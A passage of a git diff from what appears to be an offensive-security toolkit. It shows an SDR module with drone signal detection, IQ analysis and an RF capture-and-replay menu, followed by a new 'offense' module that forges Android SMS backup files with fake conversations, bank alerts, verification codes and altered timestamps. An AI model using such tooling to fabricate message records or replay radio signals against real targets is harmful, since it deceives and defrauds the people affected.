max(cluster_freqs) - min(cluster_freqs) + peak_power = max(cluster_powers) + avg_cluster_power = sum(cluster_powers) / len(cluster_powers) + + # Identify the likely protocol + protocol = self.identify_drone_protocol({ + 'center_freq': center_freq, + 'bandwidth_hz': bandwidth_hz, + 'peak_power': peak_power, + 'avg_power': avg_cluster_power, + 'noise_floor': noise_floor, + 'num_bins': len(cluster), + 'band_name': band['name'], + 'history': history, + }) + + if protocol['protocol'] == 'unknown': + continue + + # Calculate confidence based on signal characteristics + confidence = protocol.get('confidence', 0) + + # Check history for frequency hopping patterns + hopping_detected = False + if len(history) >= 3: + hopping_detected = self._detect_fhss_pattern( + center_freq, bandwidth_hz, history + ) + if hopping_detected: + confidence = min(confidence + 20, 100) + + detection = { + 'time': now, + 'frequency': center_freq, + 'frequency_mhz': round(center_freq / 1e6, 3), + 'bandwidth_mhz': round(bandwidth_hz / 1e6, 3), + 'signal_strength_db': round(peak_power, 1), + 'noise_floor_db': round(noise_floor, 1), + 'snr_db': round(peak_power - noise_floor, 1), + 'protocol': protocol['protocol'], + 'protocol_detail': protocol.get('detail', ''), + 'drone_type': protocol.get('drone_type', 'Unknown'), + 'confidence': confidence, + 'band': band['name'], + 'fhss_detected': hopping_detected, + 'duration_s': 0, + } + + # Update duration if we have seen this signal before + with self._drone_lock: + for prev in reversed(self._drone_detections): + if (prev.get('protocol') == detection['protocol'] + and abs(prev.get('frequency', 0) - center_freq) < 5000000): + try: + prev_time = datetime.fromisoformat(prev['time']) + now_time = datetime.fromisoformat(now) + delta = (now_time - prev_time).total_seconds() + if delta < 60: + detection['duration_s'] = round( + prev.get('duration_s', 0) + delta, 1 + ) + except Exception: + pass + break + + detections.append(detection) + + return detections + + def _cluster_signals(self, strong_bins: List[Dict[str, Any]]) -> List[List[Dict[str, Any]]]: + """Group adjacent frequency bins into signal clusters. + + Bins within 2 MHz of each other are considered part of the same signal. + """ + if not strong_bins: + return [] + + sorted_bins = sorted(strong_bins, key=lambda d: d['freq']) + clusters: List[List[Dict[str, Any]]] = [[sorted_bins[0]]] + + for b in sorted_bins[1:]: + # Adjacent if within 2 MHz of last bin in current cluster + if b['freq'] - clusters[-1][-1]['freq'] <= 2000000: + clusters[-1].append(b) + else: + clusters.append([b]) + + return clusters + + def _detect_fhss_pattern(self, center_freq: int, bandwidth_hz: int, + history: List[Dict[str, Any]]) -> bool: + """Detect frequency hopping spread spectrum patterns by comparing + sequential sweeps for signals that appear/disappear at different + frequencies within the same band. + + FHSS signature: power peaks shift between sweeps while maintaining + similar amplitude, consistent with drone control hopping patterns. + """ + if len(history) < 3: + return False + + # Look at the last few sweeps for peak frequency shifts + peak_freqs = [] + for sweep in history[-5:]: + data = sweep.get('data', []) + if not data: + continue + # Find the peak frequency in this sweep within the band + band_data = [d for d in data + if abs(d['freq'] - center_freq) < bandwidth_hz] + if band_data: + peak = max(band_data, key=lambda d: d['power_db']) + peak_freqs.append(peak['freq']) + + if len(peak_freqs) < 3: + return False + + # FHSS: peak frequency changes between sweeps by more than 1 MHz + # but stays within the same band + freq_shifts = [] + for i in range(1, len(peak_freqs)): + shift = abs(peak_freqs[i] - peak_freqs[i - 1]) + freq_shifts.append(shift) + + # At least 2 significant frequency shifts = likely FHSS + significant_shifts = sum(1 for s in freq_shifts if s > 1000000) + return significant_shifts >= 2 + + def identify_drone_protocol(self, spectrum_data: Dict[str, Any]) -> Dict[str, Any]: + """Analyze spectrum sweep data and return likely drone protocol + based on bandwidth, frequency, and signal characteristics. + + Args: + spectrum_data: dict with keys: + center_freq, bandwidth_hz, peak_power, avg_power, + noise_floor, num_bins, band_name, history + + Returns: + dict with protocol, detail, drone_type, confidence + """ + center = spectrum_data.get('center_freq', 0) + bw = spectrum_data.get('bandwidth_hz', 0) + peak = spectrum_data.get('peak_power', -100) + noise = spectrum_data.get('noise_floor', -80) + snr = peak - noise + band = spectrum_data.get('band_name', '') + + result = { + 'protocol': 'unknown', + 'detail': '', + 'drone_type': 'Unknown', + 'confidence': 0, + } + + # Minimum SNR for a valid detection + if snr < 10: + return result + + # ── 2.4 GHz band analysis ── + if band == '2.4 GHz ISM' or 2400000000 <= center <= 2500000000: + # DJI OcuSync 2.x/3.0: ~10-40 MHz wide FHSS on 2.4 GHz + if 8000000 <= bw <= 45000000: + result['protocol'] = 'DJI OcuSync' + result['detail'] = f'{bw/1e6:.0f} MHz wide FHSS on 2.4 GHz' + result['drone_type'] = 'DJI (Mavic/Air/Mini series)' + result['confidence'] = min(40 + int(snr), 85) + # ExpressLRS 2.4 GHz: narrower, ~1-5 MHz + elif 500000 <= bw <= 6000000: + result['protocol'] = 'ExpressLRS 2.4G' + result['detail'] = f'{bw/1e6:.1f} MHz narrow band on 2.4 GHz' + result['drone_type'] = 'FPV Racing/Freestyle Drone' + result['confidence'] = min(30 + int(snr), 70) + # Generic 2.4 GHz control -- could be WiFi drone + elif bw <= 25000000: + result['protocol'] = 'WiFi/2.4G Control' + result['detail'] = f'{bw/1e6:.1f} MHz signal on 2.4 GHz' + result['drone_type'] = 'WiFi-based drone or controller' + result['confidence'] = min(20 + int(snr * 0.5), 50) + + # ── 5.8 GHz band analysis ── + elif band == '5.8 GHz' or 5640000000 <= center <= 5950000000: + # Check against known FPV analog video channels + center_mhz = center / 1e6 + matched_channel = None + for ch_name, ch_mhz in FPV_5G_CHANNELS.items(): + if abs(center_mhz - ch_mhz) < 10: + matched_channel = ch_name + break + + if matched_channel and bw <= 15000000: + # Analog FPV video: constant carrier, ~10-12 MHz bandwidth + result['protocol'] = 'Analog FPV Video' + result['detail'] = f'Channel {matched_channel} ({center_mhz:.0f} MHz)' + result['drone_type'] = 'FPV Drone (analog video)' + result['confidence'] = min(50 + int(snr), 90) + elif 10000000 <= bw <= 80000000: + # DJI FPV / OcuSync on 5.8 GHz + result['protocol'] = 'DJI OcuSync 5.8G' + result['detail'] = f'{bw/1e6:.0f} MHz wide on 5.8 GHz' + result['drone_type'] = 'DJI FPV / Digital Link' + result['confidence'] = min(35 + int(snr), 80) + elif bw <= 10000000: + # Could be digital FPV (HDZero, Walksnail) + result['protocol'] = 'Digital FPV Video' + result['detail'] = f'{bw/1e6:.1f} MHz on 5.8 GHz' + result['drone_type'] = 'FPV Drone (digital video)' + result['confidence'] = min(25 + int(snr * 0.7), 65) + + # ── 900 MHz band analysis ── + elif band == '900 MHz' or 900000000 <= center <= 930000000: + if bw <= 2000000: + # Crossfire or ELRS 900 MHz -- narrow, hopping + result['protocol'] = 'Crossfire/ELRS 900' + result['detail'] = f'{bw/1e3:.0f} kHz on 900 MHz ISM' + result['drone_type'] = 'Long-range FPV/RC Drone' + result['confidence'] = min(30 + int(snr), 70) + elif 2000000 < bw <= 26000000: + result['protocol'] = 'Crossfire 900' + result['detail'] = f'{bw/1e6:.1f} MHz wideband 900 MHz' + result['drone_type'] = 'Long-range FPV Drone' + result['confidence'] = min(25 + int(snr * 0.7), 65) + + # ── 433 MHz band analysis ── + elif band == '433 MHz' or 432000000 <= center <= 435000000: + if bw <= 1000000: + result['protocol'] = '433 MHz Telemetry' + result['detail'] = f'{bw/1e3:.0f} kHz telemetry link' + result['drone_type'] = 'Drone with 433 telemetry' + result['confidence'] = min(20 + int(snr * 0.5), 50) + + return result + + def stop_drone_detection(self) -> Dict[str, Any]: + """Stop the drone detection background scan.""" + with self._drone_lock: + if not self._drone_running: + return {'status': 'not_running', 'message': 'Drone detection is not active'} + + self._drone_running = False + + # Wait briefly for the thread to finish + if self._drone_thread and self._drone_thread.is_alive(): + self._drone_thread.join(timeout=5) + self._drone_thread = None + + with self._drone_lock: + count = len(self._drone_detections) + + return { + 'status': 'stopped', + 'message': f'Drone detection stopped -- {count} detections recorded', + 'detection_count': count, + } + + def get_drone_detections(self) -> List[Dict[str, Any]]: + """Return current list of drone detections, newest first.""" + with self._drone_lock: + dets = list(self._drone_detections) + dets.sort(key=lambda d: d.get('time', ''), reverse=True) + return dets + + def clear_drone_detections(self): + """Clear all stored drone detections.""" + with self._drone_lock: + self._drone_detections = [] + self._save_drone_detections() + + def is_drone_detecting(self) -> bool: + """Check if drone detection is currently running.""" + with self._drone_lock: + return self._drone_running + + # ── Signal Analysis ────────────────────────────────────────────────────── + + def analyze_signal(self, file_path: str) -> Dict[str, Any]: + """Basic signal analysis on a captured IQ file.""" + fpath = self._resolve_recording(file_path) + if not fpath: + return {'error': f'Recording file not found: {file_path}'} + + try: + raw = fpath.read_bytes() + size = len(raw) + if size < 64: + return {'error': 'File too small for analysis'} + + # Parse as unsigned 8-bit IQ (RTL-SDR format) + i_samples = [] + q_samples = [] + magnitudes = [] + import math + for idx in range(0, min(size, 2048000) - 1, 2): + i_val = (raw[idx] - 127.5) / 127.5 + q_val = (raw[idx + 1] - 127.5) / 127.5 + i_samples.append(i_val) + q_samples.append(q_val) + magnitudes.append(math.sqrt(i_val * i_val + q_val * q_val)) + + if not magnitudes: + return {'error': 'No valid samples found'} + + avg_mag = sum(magnitudes) / len(magnitudes) + max_mag = max(magnitudes) + min_mag = min(magnitudes) + + # Estimate power in dB (relative to full scale) + avg_power_db = round(20 * math.log10(avg_mag + 1e-10), 2) + peak_power_db = round(20 * math.log10(max_mag + 1e-10), 2) + + # Simple duty cycle: percentage of time signal is above 50% of max + threshold = max_mag * 0.5 + above = sum(1 for m in magnitudes if m > threshold) + duty_cycle = round(above / len(magnitudes) * 100, 1) + + # Estimate bandwidth using power spectral density + # Simple FFT-based approach + n = min(len(i_samples), 4096) + fft_input = [complex(i_samples[k], q_samples[k]) for k in range(n)] + # Manual DFT for small N, or use simple approximation + bandwidth_estimate = 'N/A (requires numpy for FFT)' + + # Try modulation type guess based on signal characteristics + # AM: magnitude varies, phase relatively stable + # FM: magnitude relatively stable, phase varies + mag_variance = sum((m - avg_mag) ** 2 for m in magnitudes) / len(magnitudes) + mag_std = math.sqrt(mag_variance) + mag_cv = mag_std / (avg_mag + 1e-10) # coefficient of variation + + if mag_cv < 0.15: + mod_guess = 'FM (constant envelope)' + elif mag_cv > 0.5: + mod_guess = 'AM or OOK (high amplitude variation)' + else: + mod_guess = 'Mixed / Unknown' + + # Recording metadata from our store + meta = {} + for m in self._metadata: + if Path(m.get('file', '')).name == fpath.name: + meta = m + break + + return { + 'file': fpath.name, + 'file_size': size, + 'file_size_human': self._human_size(size), + 'total_samples': size // 2, + 'analyzed_samples': len(magnitudes), + 'power': { + 'average_db': avg_power_db, + 'peak_db': peak_power_db, + 'dynamic_range_db': round(peak_power_db - avg_power_db, 2), + }, + 'magnitude': { + 'average': round(avg_mag, 4), + 'max': round(max_mag, 4), + 'min': round(min_mag, 4), + 'std_dev': round(mag_std, 4), + }, + 'duty_cycle_pct': duty_cycle, + 'modulation_guess': mod_guess, + 'bandwidth_estimate': bandwidth_estimate, + 'frequency': meta.get('frequency', 'Unknown'), + 'sample_rate': meta.get('sample_rate', 'Unknown'), + 'device': meta.get('device', 'Unknown'), + } + except Exception as e: + return {'error': f'Analysis failed: {e}'} + + # ── Common Frequencies ─────────────────────────────────────────────────── + + def get_common_frequencies(self) -> Dict[str, Any]: + """Return the common frequencies reference dictionary.""" + return COMMON_FREQUENCIES + + # ── Status ─────────────────────────────────────────────────────────────── + + def get_status(self) -> Dict[str, Any]: + """Get current SDR status: device info, active capture, ADS-B state, drone detection.""" + capturing = self.is_capturing() + adsb_running = self._adsb_running + + status = { + 'capturing': capturing, + 'capture_info': self._capture_info if capturing else None, + 'adsb_running': adsb_running, + 'adsb_aircraft_count': len(self._adsb_aircraft), + 'drone_detecting': self.is_drone_detecting(), + 'drone_detection_count': len(self._drone_detections), + 'recordings_count': len(self.list_recordings()), + 'recordings_dir': str(self._recordings_dir), + } + return status + + # ── Helpers ────────────────────────────────────────────────────────────── + + def _resolve_recording(self, file_path: str) -> Optional[Path]: + """Resolve a recording file path, checking recordings dir.""" + fpath = Path(file_path) + if fpath.exists(): + return fpath + # Try in recordings directory + fpath = self._recordings_dir / file_path + if fpath.exists(): + return fpath + # Try just filename + fpath = self._recordings_dir / Path(file_path).name + if fpath.exists(): + return fpath + return None + + @staticmethod + def _human_size(nbytes: int) -> str: + """Convert bytes to human-readable size string.""" + for unit in ('B', 'KB', 'MB', 'GB'): + if abs(nbytes) < 1024: + return f'{nbytes:.1f} {unit}' + nbytes /= 1024 + return f'{nbytes:.1f} TB' + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_sdr_tools() -> SDRTools: + global _instance + if _instance is None: + _instance = SDRTools() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for SDR/RF Tools module.""" + import sys + sys.path.insert(0, str(Path(__file__).parent.parent)) + from core.banner import Colors, clear_screen, display_banner + + sdr = get_sdr_tools() + + while True: + clear_screen() + display_banner() + print(f"\n{Colors.CYAN}=== SDR / RF Tools ==={Colors.RESET}\n") + print(f" {Colors.GREEN}1{Colors.RESET}) Detect Devices") + print(f" {Colors.GREEN}2{Colors.RESET}) Spectrum Scan") + print(f" {Colors.GREEN}3{Colors.RESET}) Capture Signal") + print(f" {Colors.GREEN}4{Colors.RESET}) Replay Signal") + print(f" {Colors.GREEN}5{Colors.RESET}) ADS-B Track") + print(f" {Colors.GREEN}6{Colors.RESET}) FM Demod") + print(f" {Colors.GREEN}7{Colors.RESET}) AM Demod") + print(f" {Colors.GREEN}8{Colors.RESET}) List Recordings") + print(f" {Colors.GREEN}9{Colors.RESET}) Analyze Signal") + print(f" {Colors.RED}0{Colors.RESET}) Back\n") + + choice = input(f"{Colors.CYAN}Select> {Colors.RESET}").strip() + + if choice == '0': + break + + elif choice == '1': + print(f"\n{Colors.CYAN}[*] Detecting SDR devices...{Colors.RESET}") + devices = sdr.detect_devices() + if not devices: + print(f"{Colors.YELLOW}[!] No SDR devices found{Colors.RESET}") + else: + for d in devices: + status_color = Colors.GREEN if d['status'] == 'available' else Colors.YELLOW + print(f" {status_color}[{d['status']}]{Colors.RESET} {d['type']}: {d.get('name', 'Unknown')} (SN: {d.get('serial', 'N/A')})") + if d.get('capabilities'): + print(f" Capabilities: {', '.join(d['capabilities'])}") + if d.get('note'): + print(f" {Colors.YELLOW}{d['note']}{Colors.RESET}") + + elif choice == '2': + try: + dev = input(" Device (rtl/hackrf) [rtl]: ").strip() or 'rtl' + f_start = input(" Start frequency MHz [88]: ").strip() or '88' + f_end = input(" End frequency MHz [108]: ").strip() or '108' + dur = input(" Duration seconds [5]: ").strip() or '5' + print(f"\n{Colors.CYAN}[*] Scanning spectrum {f_start}-{f_end} MHz...{Colors.RESET}") + result = sdr.scan_spectrum( + device=dev, + freq_start=int(float(f_start) * 1000000), + freq_end=int(float(f_end) * 1000000), + duration=int(dur) + ) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + points = result.get('data', []) + print(f"{Colors.GREEN}[+] Collected {len(points)} data points{Colors.RESET}") + # Show top 10 strongest signals + top = sorted(points, key=lambda p: p['power_db'], reverse=True)[:10] + if top: + print(f"\n {'Frequency':>15s} {'Power (dB)':>10s}") + print(f" {'-'*15} {'-'*10}") + for p in top: + freq_str = f"{p['freq']/1e6:.3f} MHz" + print(f" {freq_str:>15s} {p['power_db']:>10.1f}") + except (ValueError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] Cancelled{Colors.RESET}") + + elif choice == '3': + try: + dev = input(" Device (rtl/hackrf) [rtl]: ").strip() or 'rtl' + freq = input(" Frequency MHz [100.0]: ").strip() or '100.0' + dur = input(" Duration seconds [10]: ").strip() or '10' + print(f"\n{Colors.CYAN}[*] Capturing at {freq} MHz for {dur}s...{Colors.RESET}") + result = sdr.start_capture( + device=dev, + frequency=int(float(freq) * 1000000), + duration=int(dur) + ) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] Capturing to: {result.get('file')}{Colors.RESET}") + print(f" Press Enter to wait for completion...") + input() + except (ValueError, KeyboardInterrupt): + sdr.stop_capture() + print(f"\n{Colors.YELLOW}[!] Capture stopped{Colors.RESET}") + + elif choice == '4': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] No recordings found{Colors.RESET}") + else: + print(f"\n Recordings:") + for i, r in enumerate(recordings): + print(f" {i+1}) {r.get('filename', 'unknown')} ({r.get('size_human', '?')})") + try: + idx = int(input(f"\n Select recording [1-{len(recordings)}]: ").strip()) - 1 + rec = recordings[idx] + freq = input(f" TX Frequency MHz [{rec.get('frequency', 100000000)/1e6:.3f}]: ").strip() + if not freq: + freq = str(rec.get('frequency', 100000000) / 1e6) + print(f"\n{Colors.CYAN}[*] Replaying {rec.get('filename')} at {freq} MHz...{Colors.RESET}") + result = sdr.replay_signal( + rec.get('file', rec.get('filename', '')), + frequency=int(float(freq) * 1000000) + ) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] {result.get('message', 'Done')}{Colors.RESET}") + except (ValueError, IndexError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] Cancelled{Colors.RESET}") + + elif choice == '5': + if sdr._adsb_running: + print(f"\n{Colors.CYAN}[*] ADS-B is running. Showing aircraft...{Colors.RESET}") + aircraft = sdr.get_adsb_aircraft() + if not aircraft: + print(f"{Colors.YELLOW} No aircraft detected yet{Colors.RESET}") + else: + print(f"\n {'ICAO':>8s} {'Callsign':>10s} {'Alt(ft)':>8s} {'Spd(kn)':>8s} {'Hdg':>5s} {'Msgs':>5s}") + print(f" {'-'*8} {'-'*10} {'-'*8} {'-'*8} {'-'*5} {'-'*5}") + for ac in aircraft[:20]: + alt = str(ac.get('altitude', '')) if ac.get('altitude') is not None else '--' + spd = str(ac.get('speed', '')) if ac.get('speed') is not None else '--' + hdg = str(ac.get('heading', '')) if ac.get('heading') is not None else '--' + print(f" {ac['icao']:>8s} {ac.get('callsign', ''):>10s} {alt:>8s} {spd:>8s} {hdg:>5s} {ac.get('messages', 0):>5d}") + + stop = input(f"\n Stop tracking? [y/N]: ").strip().lower() + if stop == 'y': + result = sdr.stop_adsb() + print(f"{Colors.GREEN}[+] {result.get('message', 'Stopped')}{Colors.RESET}") + else: + dev = input(" Device (rtl) [rtl]: ").strip() or 'rtl' + print(f"\n{Colors.CYAN}[*] Starting ADS-B tracking...{Colors.RESET}") + result = sdr.start_adsb(device=dev) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] {result.get('message', 'Started')}{Colors.RESET}") + + elif choice == '6': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] No recordings found{Colors.RESET}") + else: + print(f"\n Recordings:") + for i, r in enumerate(recordings): + print(f" {i+1}) {r.get('filename', 'unknown')} ({r.get('size_human', '?')})") + try: + idx = int(input(f"\n Select recording [1-{len(recordings)}]: ").strip()) - 1 + rec = recordings[idx] + print(f"\n{Colors.CYAN}[*] FM demodulating {rec.get('filename')}...{Colors.RESET}") + result = sdr.demodulate_fm(rec.get('file', rec.get('filename', ''))) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] Output: {result.get('filename')}{Colors.RESET}") + print(f" Duration: {result.get('duration', 0):.2f}s, Samples: {result.get('samples', 0)}") + except (ValueError, IndexError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] Cancelled{Colors.RESET}") + + elif choice == '7': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] No recordings found{Colors.RESET}") + else: + print(f"\n Recordings:") + for i, r in enumerate(recordings): + print(f" {i+1}) {r.get('filename', 'unknown')} ({r.get('size_human', '?')})") + try: + idx = int(input(f"\n Select recording [1-{len(recordings)}]: ").strip()) - 1 + rec = recordings[idx] + print(f"\n{Colors.CYAN}[*] AM demodulating {rec.get('filename')}...{Colors.RESET}") + result = sdr.demodulate_am(rec.get('file', rec.get('filename', ''))) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"{Colors.GREEN}[+] Output: {result.get('filename')}{Colors.RESET}") + print(f" Duration: {result.get('duration', 0):.2f}s, Samples: {result.get('samples', 0)}") + except (ValueError, IndexError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] Cancelled{Colors.RESET}") + + elif choice == '8': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] No recordings found{Colors.RESET}") + else: + print(f"\n {'#':>3s} {'Filename':>30s} {'Freq':>12s} {'Size':>10s} {'Device':>8s} {'Date':>20s}") + print(f" {'-'*3} {'-'*30} {'-'*12} {'-'*10} {'-'*8} {'-'*20}") + for i, r in enumerate(recordings): + freq = r.get('frequency', 0) + freq_str = f"{freq/1e6:.3f} MHz" if freq else 'N/A' + date_str = r.get('completed', '')[:19] if r.get('completed') else 'N/A' + print(f" {i+1:>3d} {r.get('filename', 'unknown'):>30s} {freq_str:>12s} {r.get('size_human', '?'):>10s} {r.get('device', '?'):>8s} {date_str:>20s}") + + elif choice == '9': + recordings = sdr.list_recordings() + if not recordings: + print(f"\n{Colors.YELLOW}[!] No recordings found{Colors.RESET}") + else: + print(f"\n Recordings:") + for i, r in enumerate(recordings): + print(f" {i+1}) {r.get('filename', 'unknown')} ({r.get('size_human', '?')})") + try: + idx = int(input(f"\n Select recording [1-{len(recordings)}]: ").strip()) - 1 + rec = recordings[idx] + print(f"\n{Colors.CYAN}[*] Analyzing {rec.get('filename')}...{Colors.RESET}") + result = sdr.analyze_signal(rec.get('file', rec.get('filename', ''))) + if result.get('error'): + print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}") + else: + print(f"\n {Colors.GREEN}Signal Analysis:{Colors.RESET}") + print(f" File: {result.get('file', 'unknown')}") + print(f" Size: {result.get('file_size_human', '?')}") + print(f" Samples: {result.get('total_samples', 0):,}") + pwr = result.get('power', {}) + print(f" Avg Power: {pwr.get('average_db', '?')} dB") + print(f" Peak Power: {pwr.get('peak_db', '?')} dB") + print(f" Dynamic Range: {pwr.get('dynamic_range_db', '?')} dB") + print(f" Duty Cycle: {result.get('duty_cycle_pct', '?')}%") + print(f" Modulation: {result.get('modulation_guess', '?')}") + except (ValueError, IndexError, KeyboardInterrupt): + print(f"\n{Colors.YELLOW}[!] Cancelled{Colors.RESET}") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") diff --git a/modules/sms_forge.py b/modules/sms_forge.py new file mode 100644 index 0000000..f3c7e03 --- /dev/null +++ b/modules/sms_forge.py @@ -0,0 +1,1502 @@ +"""AUTARCH SMS/MMS Backup Forge + +Create and modify SMS/MMS backup XML files in the format used by +"SMS Backup & Restore" (SyncTech) -- the most popular Android SMS backup app. +Supports full conversation generation, template-based message creation, +bulk import/export, and timestamp manipulation. +""" + +DESCRIPTION = "SMS/MMS Backup Forge — Create & Modify Backup Conversations" +AUTHOR = "AUTARCH" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import csv +import json +import uuid +import time +import base64 +import html +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional, Any +from xml.etree import ElementTree as ET + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return Path(__file__).resolve().parent.parent / 'data' + + +# ── Module-level singleton ────────────────────────────────────────────────── + +_instance: Optional['SMSForge'] = None + + +def get_sms_forge() -> 'SMSForge': + """Return the module singleton, creating it on first call.""" + global _instance + if _instance is None: + _instance = SMSForge() + return _instance + + +# ── Built-in Conversation Templates ──────────────────────────────────────── + +BUILTIN_TEMPLATES = { + "business_meeting": { + "name": "Business Meeting", + "description": "Scheduling a meeting, confirming time and place", + "messages": [ + {"body": "Hi {contact}, are you available for a meeting on {date}?", "type": 2, "delay_minutes": 0}, + {"body": "Let me check my schedule. What time works for you?", "type": 1, "delay_minutes": 12}, + {"body": "How about {time} at {location}?", "type": 2, "delay_minutes": 5}, + {"body": "That works for me. I'll bring the {topic} documents.", "type": 1, "delay_minutes": 8}, + {"body": "Perfect. See you then!", "type": 2, "delay_minutes": 3}, + {"body": "See you there. Thanks for setting this up.", "type": 1, "delay_minutes": 2}, + ], + "variables": ["contact", "date", "time", "location", "topic"], + }, + "casual_chat": { + "name": "Casual Chat", + "description": "General friendly conversation between friends", + "messages": [ + {"body": "Hey {contact}! How's it going?", "type": 2, "delay_minutes": 0}, + {"body": "Hey! Pretty good, just got back from {activity}. You?", "type": 1, "delay_minutes": 15}, + {"body": "Nice! I've been {my_activity}. We should hang out soon.", "type": 2, "delay_minutes": 7}, + {"body": "Definitely! How about {day}?", "type": 1, "delay_minutes": 4}, + {"body": "Sounds great, let's do it. I'll text you the details later.", "type": 2, "delay_minutes": 3}, + {"body": "Cool, talk to you later!", "type": 1, "delay_minutes": 1}, + ], + "variables": ["contact", "activity", "my_activity", "day"], + }, + "delivery_notification": { + "name": "Delivery Notification", + "description": "Package tracking updates from a delivery service", + "messages": [ + {"body": "Your order #{order_id} has been shipped! Track at: {tracking_url}", "type": 1, "delay_minutes": 0}, + {"body": "Update: Your package is out for delivery today. Estimated arrival: {eta}.", "type": 1, "delay_minutes": 1440}, + {"body": "Your package has been delivered! Left at: {location}.", "type": 1, "delay_minutes": 360}, + ], + "variables": ["order_id", "tracking_url", "eta", "location"], + }, + "verification_codes": { + "name": "Verification Codes", + "description": "OTP/2FA codes from various services", + "messages": [ + {"body": "Your {service} verification code is: {code}. Do not share this code.", "type": 1, "delay_minutes": 0}, + {"body": "{service2} security code: {code2}. This code expires in 10 minutes.", "type": 1, "delay_minutes": 120}, + {"body": "Your {service3} login code is {code3}. If you didn't request this, ignore this message.", "type": 1, "delay_minutes": 240}, + ], + "variables": ["service", "code", "service2", "code2", "service3", "code3"], + }, + "bank_alerts": { + "name": "Bank Alerts", + "description": "Bank transaction notifications and alerts", + "messages": [ + {"body": "{bank}: Purchase of ${amount} at {merchant} on card ending {card_last4}. Balance: ${balance}.", "type": 1, "delay_minutes": 0}, + {"body": "{bank}: Direct deposit of ${deposit_amount} received. New balance: ${new_balance}.", "type": 1, "delay_minutes": 4320}, + {"body": "{bank} Alert: Unusual activity detected on your account. If this was not you, call {phone}.", "type": 1, "delay_minutes": 2880}, + {"body": "{bank}: Your scheduled payment of ${payment_amount} to {payee} has been processed.", "type": 1, "delay_minutes": 1440}, + ], + "variables": ["bank", "amount", "merchant", "card_last4", "balance", + "deposit_amount", "new_balance", "phone", + "payment_amount", "payee"], + }, + "custom": { + "name": "Custom", + "description": "Empty template for user-defined conversations", + "messages": [], + "variables": [], + }, +} + + +# ── SMS Forge Class ───────────────────────────────────────────────────────── + +class SMSForge: + """Create, modify, and export SMS/MMS backup XML files.""" + + def __init__(self): + self._data_dir = Path(get_data_dir()) / 'sms_forge' + self._data_dir.mkdir(parents=True, exist_ok=True) + self._messages: List[Dict[str, Any]] = [] + self._backup_set: str = self._generate_uuid() + self._backup_date: int = int(time.time() * 1000) + self._backup_type: str = "full" + self._custom_templates: Dict[str, dict] = {} + self._load_custom_templates() + + # ── Backup Management ─────────────────────────────────────────────────── + + def create_backup(self, messages: List[Dict[str, Any]], output_path: str) -> Dict[str, Any]: + """Create a new SMS Backup & Restore XML file from a list of message dicts. + + Each message dict should have at minimum: + address, body, type (for SMS) or msg_box (for MMS) + Optional: timestamp, contact_name, read, locked, attachments + """ + self._messages = [] + for msg in messages: + if msg.get('is_mms') or msg.get('attachments'): + self.add_mms( + address=msg.get('address', ''), + body=msg.get('body', ''), + attachments=msg.get('attachments', []), + msg_box=msg.get('msg_box', msg.get('type', 1)), + timestamp=msg.get('timestamp') or msg.get('date'), + contact_name=msg.get('contact_name', '(Unknown)'), + ) + else: + self.add_sms( + address=msg.get('address', ''), + body=msg.get('body', ''), + msg_type=msg.get('type', 1), + timestamp=msg.get('timestamp') or msg.get('date'), + contact_name=msg.get('contact_name', '(Unknown)'), + read=msg.get('read', 1), + locked=msg.get('locked', 0), + ) + return self.save_backup(output_path) + + def load_backup(self, xml_path: str) -> Dict[str, Any]: + """Parse existing backup XML into internal format.""" + path = Path(xml_path) + if not path.exists(): + return {'ok': False, 'error': f'File not found: {xml_path}'} + try: + tree = ET.parse(str(path)) + root = tree.getroot() + if root.tag != 'smses': + return {'ok': False, 'error': 'Invalid XML: root element must be '} + + self._backup_set = root.get('backup_set', self._generate_uuid()) + self._backup_date = int(root.get('backup_date', str(int(time.time() * 1000)))) + self._backup_type = root.get('type', 'full') + self._messages = [] + + for elem in root: + if elem.tag == 'sms': + msg = { + 'msg_kind': 'sms', + 'protocol': elem.get('protocol', '0'), + 'address': elem.get('address', ''), + 'date': int(elem.get('date', '0')), + 'type': int(elem.get('type', '1')), + 'subject': elem.get('subject', 'null'), + 'body': elem.get('body', ''), + 'toa': elem.get('toa', 'null'), + 'sc_toa': elem.get('sc_toa', 'null'), + 'service_center': elem.get('service_center', 'null'), + 'read': int(elem.get('read', '1')), + 'status': int(elem.get('status', '-1')), + 'locked': int(elem.get('locked', '0')), + 'sub_id': elem.get('sub_id', '-1'), + 'readable_date': elem.get('readable_date', ''), + 'contact_name': elem.get('contact_name', '(Unknown)'), + } + self._messages.append(msg) + elif elem.tag == 'mms': + msg = self._parse_mms_element(elem) + self._messages.append(msg) + + return { + 'ok': True, + 'count': len(self._messages), + 'backup_set': self._backup_set, + 'backup_date': self._backup_date, + } + except ET.ParseError as e: + return {'ok': False, 'error': f'XML parse error: {e}'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def _parse_mms_element(self, elem: ET.Element) -> Dict[str, Any]: + """Parse a single element into a dict.""" + msg: Dict[str, Any] = { + 'msg_kind': 'mms', + 'date': 